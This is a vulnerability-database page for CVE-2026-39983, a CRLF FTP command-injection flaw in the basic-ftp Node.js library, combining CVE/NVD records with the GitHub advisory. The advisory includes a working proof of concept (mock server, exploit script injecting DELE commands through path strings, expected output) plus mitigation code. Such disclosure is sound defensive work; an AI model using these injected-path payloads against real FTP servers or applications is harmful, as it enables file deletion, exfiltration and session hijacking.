Vulnerability-Lookup

CVE-2026-39983 (GCVE-0-2026-39983)

Vulnerability from cvelistv5 – Published: 2026-04-09 17:05 – Updated: 2026-04-09 19:31

Title

FTP Command Injection via CRLF in basic-ftp

Summary

basic-ftp is an FTP client for Node.js. Prior to 5.2.1, basic-ftp allows FTP command injection via CRLF sequences (\r\n) in file path parameters passed to high-level path APIs such as cd(), remove(), rename(), uploadFrom(), downloadTo(), list(), and removeDir(). The library's protectWhitespace() helper only handles leading spaces and returns other paths unchanged, while FtpContext.send() writes the resulting command string directly to the control socket with \r\n appended. This lets attacker-controlled path strings split one intended FTP command into multiple commands. This vulnerability is fixed in 5.2.1.

Severity ?

8.6 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L

CWE

CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/patrickjuchli/basic-ftp/securi…	x_refsource_CONFIRM
	https://github.com/patrickjuchli/basic-ftp/commit…	x_refsource_MISC
	https://github.com/patrickjuchli/basic-ftp/releas…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	patrickjuchli	basic-ftp	Affected: < 5.2.1

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-39983",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-04-09T17:32:54.638105Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-09T19:31:42.093Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-chqc-8p9q-pq6q"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "basic-ftp",
          "vendor": "patrickjuchli",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 5.2.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "basic-ftp is an FTP client for Node.js. Prior to 5.2.1, basic-ftp allows FTP command injection via CRLF sequences (\\r\\n) in file path parameters passed to high-level path APIs such as cd(), remove(), rename(), uploadFrom(), downloadTo(), list(), and removeDir(). The library\u0027s protectWhitespace() helper only handles leading spaces and returns other paths unchanged, while FtpContext.send() writes the resulting command string directly to the control socket with \\r\\n appended. This lets attacker-controlled path strings split one intended FTP command into multiple commands. This vulnerability is fixed in 5.2.1."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 8.6,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-93",
              "description": "CWE-93: Improper Neutralization of CRLF Sequences (\u0027CRLF Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-04-09T17:05:46.228Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-chqc-8p9q-pq6q",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-chqc-8p9q-pq6q"
        },
        {
          "name": "https://github.com/patrickjuchli/basic-ftp/commit/2ecc8e2c500c5234115f06fd1dbde1aa03d70f4b",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/patrickjuchli/basic-ftp/commit/2ecc8e2c500c5234115f06fd1dbde1aa03d70f4b"
        },
        {
          "name": "https://github.com/patrickjuchli/basic-ftp/releases/tag/v5.2.1",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/patrickjuchli/basic-ftp/releases/tag/v5.2.1"
        }
      ],
      "source": {
        "advisory": "GHSA-chqc-8p9q-pq6q",
        "discovery": "UNKNOWN"
      },
      "title": "FTP Command Injection via CRLF in basic-ftp"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-39983",
    "datePublished": "2026-04-09T17:05:46.228Z",
    "dateReserved": "2026-04-08T00:01:47.628Z",
    "dateUpdated": "2026-04-09T19:31:42.093Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-39983",
      "date": "2026-04-14",
      "epss": "0.0156",
      "percentile": "0.81482"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-39983\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-09T18:17:02.503\",\"lastModified\":\"2026-04-14T20:07:51.800\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"basic-ftp is an FTP client for Node.js. Prior to 5.2.1, basic-ftp allows FTP command injection via CRLF sequences (\\\\r\\\\n) in file path parameters passed to high-level path APIs such as cd(), remove(), rename(), uploadFrom(), downloadTo(), list(), and removeDir(). The library\u0027s protectWhitespace() helper only handles leading spaces and returns other paths unchanged, while FtpContext.send() writes the resulting command string directly to the control socket with \\\\r\\\\n appended. This lets attacker-controlled path strings split one intended FTP command into multiple commands. This vulnerability is fixed in 5.2.1.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L\",\"baseScore\":8.6,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":3.9,\"impactScore\":4.7}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-93\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:patrickjuchli:basic-ftp:*:*:*:*:*:node.js:*:*\",\"versionEndExcluding\":\"5.2.1\",\"matchCriteriaId\":\"C779DF66-693E-4EB3-B33E-AC0A43741872\"}]}]}],\"references\":[{\"url\":\"https://github.com/patrickjuchli/basic-ftp/commit/2ecc8e2c500c5234115f06fd1dbde1aa03d70f4b\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/patrickjuchli/basic-ftp/releases/tag/v5.2.1\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-chqc-8p9q-pq6q\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-chqc-8p9q-pq6q\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"cna\": {\"title\": \"FTP Command Injection via CRLF in basic-ftp\", \"problemTypes\": [{\"descriptions\": [{\"cweId\": \"CWE-93\", \"lang\": \"en\", \"description\": \"CWE-93: Improper Neutralization of CRLF Sequences (\u0027CRLF Injection\u0027)\", \"type\": \"CWE\"}]}], \"metrics\": [{\"cvssV3_1\": {\"attackComplexity\": \"LOW\", \"attackVector\": \"NETWORK\", \"availabilityImpact\": \"LOW\", \"baseScore\": 8.6, \"baseSeverity\": \"HIGH\", \"confidentialityImpact\": \"LOW\", \"integrityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"scope\": \"UNCHANGED\", \"userInteraction\": \"NONE\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L\", \"version\": \"3.1\"}}], \"references\": [{\"name\": \"https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-chqc-8p9q-pq6q\", \"tags\": [\"x_refsource_CONFIRM\"], \"url\": \"https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-chqc-8p9q-pq6q\"}, {\"name\": \"https://github.com/patrickjuchli/basic-ftp/commit/2ecc8e2c500c5234115f06fd1dbde1aa03d70f4b\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/patrickjuchli/basic-ftp/commit/2ecc8e2c500c5234115f06fd1dbde1aa03d70f4b\"}, {\"name\": \"https://github.com/patrickjuchli/basic-ftp/releases/tag/v5.2.1\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/patrickjuchli/basic-ftp/releases/tag/v5.2.1\"}], \"affected\": [{\"vendor\": \"patrickjuchli\", \"product\": \"basic-ftp\", \"versions\": [{\"version\": \"\u003c 5.2.1\", \"status\": \"affected\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-09T17:05:46.228Z\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"basic-ftp is an FTP client for Node.js. Prior to 5.2.1, basic-ftp allows FTP command injection via CRLF sequences (\\\\r\\\\n) in file path parameters passed to high-level path APIs such as cd(), remove(), rename(), uploadFrom(), downloadTo(), list(), and removeDir(). The library\u0027s protectWhitespace() helper only handles leading spaces and returns other paths unchanged, while FtpContext.send() writes the resulting command string directly to the control socket with \\\\r\\\\n appended. This lets attacker-controlled path strings split one intended FTP command into multiple commands. This vulnerability is fixed in 5.2.1.\"}], \"source\": {\"advisory\": \"GHSA-chqc-8p9q-pq6q\", \"discovery\": \"UNKNOWN\"}}, \"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-39983\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-09T17:32:54.638105Z\"}}}], \"references\": [{\"url\": \"https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-chqc-8p9q-pq6q\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-09T17:33:06.392Z\"}}]}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-39983\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"state\": \"PUBLISHED\", \"assignerShortName\": \"GitHub_M\", \"dateReserved\": \"2026-04-08T00:01:47.628Z\", \"datePublished\": \"2026-04-09T17:05:46.228Z\", \"dateUpdated\": \"2026-04-09T19:31:42.093Z\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-39983

Vulnerability from fkie_nvd - Published: 2026-04-09 18:17 - Updated: 2026-04-14 20:07

Severity ?

8.6 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/patrickjuchli/basic-ftp/commit/2ecc8e2c500c5234115f06fd1dbde1aa03d70f4b	Patch
security-advisories@github.com	https://github.com/patrickjuchli/basic-ftp/releases/tag/v5.2.1	Product, Release Notes
security-advisories@github.com	https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-chqc-8p9q-pq6q	Exploit, Mitigation, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-chqc-8p9q-pq6q	Exploit, Mitigation, Vendor Advisory

Impacted products

	Vendor	Product	Version
	patrickjuchli	basic-ftp	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:patrickjuchli:basic-ftp:*:*:*:*:*:node.js:*:*",
              "matchCriteriaId": "C779DF66-693E-4EB3-B33E-AC0A43741872",
              "versionEndExcluding": "5.2.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "basic-ftp is an FTP client for Node.js. Prior to 5.2.1, basic-ftp allows FTP command injection via CRLF sequences (\\r\\n) in file path parameters passed to high-level path APIs such as cd(), remove(), rename(), uploadFrom(), downloadTo(), list(), and removeDir(). The library\u0027s protectWhitespace() helper only handles leading spaces and returns other paths unchanged, while FtpContext.send() writes the resulting command string directly to the control socket with \\r\\n appended. This lets attacker-controlled path strings split one intended FTP command into multiple commands. This vulnerability is fixed in 5.2.1."
    }
  ],
  "id": "CVE-2026-39983",
  "lastModified": "2026-04-14T20:07:51.800",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 8.6,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "LOW",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 4.7,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-04-09T18:17:02.503",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/patrickjuchli/basic-ftp/commit/2ecc8e2c500c5234115f06fd1dbde1aa03d70f4b"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product",
        "Release Notes"
      ],
      "url": "https://github.com/patrickjuchli/basic-ftp/releases/tag/v5.2.1"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-chqc-8p9q-pq6q"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-chqc-8p9q-pq6q"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-93"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-CHQC-8P9Q-PQ6Q

Vulnerability from github – Published: 2026-04-08 20:02 – Updated: 2026-04-09 19:06

Summary

basic-ftp has FTP Command Injection via CRLF

Details

Summary

basic-ftp version 5.2.0 allows FTP command injection via CRLF sequences (\r\n) in file path parameters passed to high-level path APIs such as cd(), remove(), rename(), uploadFrom(), downloadTo(), list(), and removeDir(). The library's protectWhitespace() helper only handles leading spaces and returns other paths unchanged, while FtpContext.send() writes the resulting command string directly to the control socket with \r\n appended. This lets attacker-controlled path strings split one intended FTP command into multiple commands.

Affected product

Product	Affected versions	Fixed version
basic-ftp (npm)	5.2.0 (confirmed)	no fix available as of 2026-04-04

Vulnerability details

CWE: CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')
CVSS 3.1: 8.6 (High)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L
Affected component: dist/Client.js, all path-handling methods via protectWhitespace() and send()

The vulnerability exists because of two interacting code patterns:

1. Inadequate path sanitization in protectWhitespace() (line 677):

async protectWhitespace(path) {
    if (!path.startsWith(" ")) {
        return path;  // No sanitization of \r\n characters
    }
    const pwd = await this.pwd();
    const absolutePathPrefix = pwd.endsWith("/") ? pwd : pwd + "/";
    return absolutePathPrefix + path;
}

This function only handles leading whitespace. It does not strip or reject \r (0x0D) or \n (0x0A) characters anywhere in the path string.

2. Direct socket write in send() (FtpContext.js line 177):

send(command) {
    this._socket.write(command + "\r\n", this.encoding);
}

The send() method appends \r\n to the command and writes directly to the TCP socket. If the command string already contains \r\n sequences (from unsanitized path input), the FTP server interprets them as command delimiters, causing the single intended command to be split into multiple commands.

Affected methods (all call protectWhitespace() → send()): - cd(path) → CWD ${path} - remove(path) → DELE ${path} - list(path) → LIST ${path} - downloadTo(localPath, remotePath) → RETR ${remotePath} - uploadFrom(localPath, remotePath) → STOR ${remotePath} - rename(srcPath, destPath) → RNFR ${srcPath} / RNTO ${destPath} - removeDir(path) → RMD ${path}

Technical impact

An attacker who controls file path parameters can inject arbitrary FTP protocol commands, enabling:

Arbitrary file deletion: Inject DELE /critical-file to delete files on the FTP server
Directory manipulation: Inject MKD or RMD commands to create/remove directories
File exfiltration: Inject RETR commands to trigger downloads of unintended files
Server command execution: On FTP servers supporting SITE EXEC, inject system commands
Session hijacking: Inject USER/PASS commands to re-authenticate as a different user
Service disruption: Inject QUIT to terminate the FTP session unexpectedly

The attack is realistic in applications that accept user input for FTP file paths — for example, web applications that allow users to specify files to download from or upload to an FTP server.

Proof of concept

Prerequisites:

mkdir basic-ftp-poc && cd basic-ftp-poc
npm init -y
npm install basic-ftp@5.2.0

Mock FTP server (ftp-server-mock.js):

const net = require('net');
const server = net.createServer(conn => {
  console.log('[+] Client connected');
  conn.write('220 Mock FTP\r\n');
  let buffer = '';
  conn.on('data', data => {
    buffer += data.toString();
    const lines = buffer.split('\r\n');
    buffer = lines.pop();
    for (const line of lines) {
      if (!line) continue;
      console.log('[CMD] ' + JSON.stringify(line));
      if (line.startsWith('USER')) conn.write('331 OK\r\n');
      else if (line.startsWith('PASS')) conn.write('230 Logged in\r\n');
      else if (line.startsWith('FEAT')) conn.write('211 End\r\n');
      else if (line.startsWith('TYPE')) conn.write('200 OK\r\n');
      else if (line.startsWith('PWD'))  conn.write('257 "/"\r\n');
      else if (line.startsWith('OPTS')) conn.write('200 OK\r\n');
      else if (line.startsWith('STRU')) conn.write('200 OK\r\n');
      else if (line.startsWith('CWD'))  conn.write('250 OK\r\n');
      else if (line.startsWith('DELE')) conn.write('250 Deleted\r\n');
      else if (line.startsWith('QUIT')) { conn.write('221 Bye\r\n'); conn.end(); }
      else conn.write('200 OK\r\n');
    }
  });
});
server.listen(2121, () => console.log('[*] Mock FTP on port 2121'));

Exploit (poc.js):

const ftp = require('basic-ftp');

async function exploit() {
  const client = new ftp.Client();
  client.ftp.verbose = true;
  try {
    await client.access({
      host: '127.0.0.1',
      port: 2121,
      user: 'anonymous',
      password: 'anonymous'
    });

    // Attack 1: Inject DELE command via cd()
    // Intended: CWD harmless.txt
    // Actual:   CWD harmless.txt\r\nDELE /important-file.txt
    const maliciousPath = "harmless.txt\r\nDELE /important-file.txt";
    console.log('\n=== Attack 1: DELE injection via cd() ===');
    try { await client.cd(maliciousPath); } catch(e) {}

    // Attack 2: Double DELE via remove()
    const maliciousPath2 = "decoy.txt\r\nDELE /secret-data.txt";
    console.log('\n=== Attack 2: DELE injection via remove() ===');
    try { await client.remove(maliciousPath2); } catch(e) {}

  } finally {
    client.close();
  }
}
exploit();

Running the PoC:

# Terminal 1: Start mock FTP server
node ftp-server-mock.js

# Terminal 2: Run exploit
node poc.js

Expected output on mock server:

"OPTS UTF8 ON"
"USER anonymous"
"PASS anonymous"
"FEAT"
"TYPE I"
"STRU F"
"OPTS UTF8 ON"
"CWD harmless.txt"
"DELE /important-file.txt"   <-- injected from cd()
"DELE decoy.txt"
"DELE /secret-data.txt"      <-- injected from remove()
"QUIT"

This command trace was reproduced against the published basic-ftp@5.2.0 package on Linux with a local mock FTP server. The injected DELE commands are received as distinct FTP commands, confirming that CRLF inside path parameters is not neutralized before socket write.

Mitigation

Immediate workaround: Sanitize all path inputs before passing them to basic-ftp:

function sanitizeFtpPath(path) {
  if (/[\r\n]/.test(path)) {
    throw new Error('Invalid FTP path: contains control characters');
  }
  return path;
}

// Usage
await client.cd(sanitizeFtpPath(userInput));

Recommended fix for basic-ftp: The protectWhitespace() function (or a new validation layer) should reject or strip \r and \n characters from all path inputs:

async protectWhitespace(path) {
    // Reject CRLF injection attempts
    if (/[\r\n\0]/.test(path)) {
        throw new Error('Invalid path: contains control characters');
    }
    if (!path.startsWith(" ")) {
        return path;
    }
    const pwd = await this.pwd();
    const absolutePathPrefix = pwd.endsWith("/") ? pwd : pwd + "/";
    return absolutePathPrefix + path;
}

References

Severity ?

8.6 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "basic-ftp"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.2.0"
            },
            {
              "fixed": "5.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "5.2.0"
      ]
    }
  ],
  "aliases": [
    "CVE-2026-39983"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-93"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-08T20:02:25Z",
    "nvd_published_at": "2026-04-09T18:17:02Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\n`basic-ftp` version `5.2.0` allows FTP command injection via CRLF sequences (`\\r\\n`) in file path parameters passed to high-level path APIs such as `cd()`, `remove()`, `rename()`, `uploadFrom()`, `downloadTo()`, `list()`, and `removeDir()`. The library\u0027s `protectWhitespace()` helper only handles leading spaces and returns other paths unchanged, while `FtpContext.send()` writes the resulting command string directly to the control socket with `\\r\\n` appended. This lets attacker-controlled path strings split one intended FTP command into multiple commands.\n\n## Affected product\n\n| Product | Affected versions | Fixed version |\n| --- | --- | --- |\n| basic-ftp (npm) | 5.2.0 (confirmed) | no fix available as of 2026-04-04 |\n\n## Vulnerability details\n\n- CWE: `CWE-93` - Improper Neutralization of CRLF Sequences (\u0027CRLF Injection\u0027)\n- CVSS 3.1: `8.6` (`High`)\n- Vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L`\n- Affected component: `dist/Client.js`, all path-handling methods via `protectWhitespace()` and `send()`\n\nThe vulnerability exists because of two interacting code patterns:\n\n**1. Inadequate path sanitization in `protectWhitespace()` (line 677):**\n\n```javascript\nasync protectWhitespace(path) {\n    if (!path.startsWith(\" \")) {\n        return path;  // No sanitization of \\r\\n characters\n    }\n    const pwd = await this.pwd();\n    const absolutePathPrefix = pwd.endsWith(\"/\") ? pwd : pwd + \"/\";\n    return absolutePathPrefix + path;\n}\n```\n\nThis function only handles leading whitespace. It does not strip or reject `\\r` (0x0D) or `\\n` (0x0A) characters anywhere in the path string.\n\n**2. Direct socket write in `send()` (FtpContext.js line 177):**\n\n```javascript\nsend(command) {\n    this._socket.write(command + \"\\r\\n\", this.encoding);\n}\n```\n\nThe `send()` method appends `\\r\\n` to the command and writes directly to the TCP socket. If the command string already contains `\\r\\n` sequences (from unsanitized path input), the FTP server interprets them as command delimiters, causing the single intended command to be split into multiple commands.\n\n**Affected methods** (all call `protectWhitespace()` \u2192 `send()`):\n- `cd(path)` \u2192 `CWD ${path}`\n- `remove(path)` \u2192 `DELE ${path}`\n- `list(path)` \u2192 `LIST ${path}`\n- `downloadTo(localPath, remotePath)` \u2192 `RETR ${remotePath}`\n- `uploadFrom(localPath, remotePath)` \u2192 `STOR ${remotePath}`\n- `rename(srcPath, destPath)` \u2192 `RNFR ${srcPath}` / `RNTO ${destPath}`\n- `removeDir(path)` \u2192 `RMD ${path}`\n\n## Technical impact\n\nAn attacker who controls file path parameters can inject arbitrary FTP protocol commands, enabling:\n\n1. **Arbitrary file deletion**: Inject `DELE /critical-file` to delete files on the FTP server\n2. **Directory manipulation**: Inject `MKD` or `RMD` commands to create/remove directories\n3. **File exfiltration**: Inject `RETR` commands to trigger downloads of unintended files\n4. **Server command execution**: On FTP servers supporting `SITE EXEC`, inject system commands\n5. **Session hijacking**: Inject `USER`/`PASS` commands to re-authenticate as a different user\n6. **Service disruption**: Inject `QUIT` to terminate the FTP session unexpectedly\n\nThe attack is realistic in applications that accept user input for FTP file paths \u2014 for example, web applications that allow users to specify files to download from or upload to an FTP server.\n\n## Proof of concept\n\n**Prerequisites:**\n\n```bash\nmkdir basic-ftp-poc \u0026\u0026 cd basic-ftp-poc\nnpm init -y\nnpm install basic-ftp@5.2.0\n```\n\n**Mock FTP server (ftp-server-mock.js):**\n\n```javascript\nconst net = require(\u0027net\u0027);\nconst server = net.createServer(conn =\u003e {\n  console.log(\u0027[+] Client connected\u0027);\n  conn.write(\u0027220 Mock FTP\\r\\n\u0027);\n  let buffer = \u0027\u0027;\n  conn.on(\u0027data\u0027, data =\u003e {\n    buffer += data.toString();\n    const lines = buffer.split(\u0027\\r\\n\u0027);\n    buffer = lines.pop();\n    for (const line of lines) {\n      if (!line) continue;\n      console.log(\u0027[CMD] \u0027 + JSON.stringify(line));\n      if (line.startsWith(\u0027USER\u0027)) conn.write(\u0027331 OK\\r\\n\u0027);\n      else if (line.startsWith(\u0027PASS\u0027)) conn.write(\u0027230 Logged in\\r\\n\u0027);\n      else if (line.startsWith(\u0027FEAT\u0027)) conn.write(\u0027211 End\\r\\n\u0027);\n      else if (line.startsWith(\u0027TYPE\u0027)) conn.write(\u0027200 OK\\r\\n\u0027);\n      else if (line.startsWith(\u0027PWD\u0027))  conn.write(\u0027257 \"/\"\\r\\n\u0027);\n      else if (line.startsWith(\u0027OPTS\u0027)) conn.write(\u0027200 OK\\r\\n\u0027);\n      else if (line.startsWith(\u0027STRU\u0027)) conn.write(\u0027200 OK\\r\\n\u0027);\n      else if (line.startsWith(\u0027CWD\u0027))  conn.write(\u0027250 OK\\r\\n\u0027);\n      else if (line.startsWith(\u0027DELE\u0027)) conn.write(\u0027250 Deleted\\r\\n\u0027);\n      else if (line.startsWith(\u0027QUIT\u0027)) { conn.write(\u0027221 Bye\\r\\n\u0027); conn.end(); }\n      else conn.write(\u0027200 OK\\r\\n\u0027);\n    }\n  });\n});\nserver.listen(2121, () =\u003e console.log(\u0027[*] Mock FTP on port 2121\u0027));\n```\n\n**Exploit (poc.js):**\n\n```javascript\nconst ftp = require(\u0027basic-ftp\u0027);\n\nasync function exploit() {\n  const client = new ftp.Client();\n  client.ftp.verbose = true;\n  try {\n    await client.access({\n      host: \u0027127.0.0.1\u0027,\n      port: 2121,\n      user: \u0027anonymous\u0027,\n      password: \u0027anonymous\u0027\n    });\n\n    // Attack 1: Inject DELE command via cd()\n    // Intended: CWD harmless.txt\n    // Actual:   CWD harmless.txt\\r\\nDELE /important-file.txt\n    const maliciousPath = \"harmless.txt\\r\\nDELE /important-file.txt\";\n    console.log(\u0027\\n=== Attack 1: DELE injection via cd() ===\u0027);\n    try { await client.cd(maliciousPath); } catch(e) {}\n\n    // Attack 2: Double DELE via remove()\n    const maliciousPath2 = \"decoy.txt\\r\\nDELE /secret-data.txt\";\n    console.log(\u0027\\n=== Attack 2: DELE injection via remove() ===\u0027);\n    try { await client.remove(maliciousPath2); } catch(e) {}\n\n  } finally {\n    client.close();\n  }\n}\nexploit();\n```\n\n**Running the PoC:**\n\n```bash\n# Terminal 1: Start mock FTP server\nnode ftp-server-mock.js\n\n# Terminal 2: Run exploit\nnode poc.js\n```\n\n**Expected output on mock server:**\n\n```\n\"OPTS UTF8 ON\"\n\"USER anonymous\"\n\"PASS anonymous\"\n\"FEAT\"\n\"TYPE I\"\n\"STRU F\"\n\"OPTS UTF8 ON\"\n\"CWD harmless.txt\"\n\"DELE /important-file.txt\"   \u003c-- injected from cd()\n\"DELE decoy.txt\"\n\"DELE /secret-data.txt\"      \u003c-- injected from remove()\n\"QUIT\"\n```\n\nThis command trace was reproduced against the published `basic-ftp@5.2.0`\npackage on Linux with a local mock FTP server. The injected `DELE` commands are\nreceived as distinct FTP commands, confirming that CRLF inside path parameters\nis not neutralized before socket write.\n\n## Mitigation\n\n**Immediate workaround**: Sanitize all path inputs before passing them to basic-ftp:\n\n```javascript\nfunction sanitizeFtpPath(path) {\n  if (/[\\r\\n]/.test(path)) {\n    throw new Error(\u0027Invalid FTP path: contains control characters\u0027);\n  }\n  return path;\n}\n\n// Usage\nawait client.cd(sanitizeFtpPath(userInput));\n```\n\n**Recommended fix for basic-ftp**: The `protectWhitespace()` function (or a new validation layer) should reject or strip `\\r` and `\\n` characters from all path inputs:\n\n```javascript\nasync protectWhitespace(path) {\n    // Reject CRLF injection attempts\n    if (/[\\r\\n\\0]/.test(path)) {\n        throw new Error(\u0027Invalid path: contains control 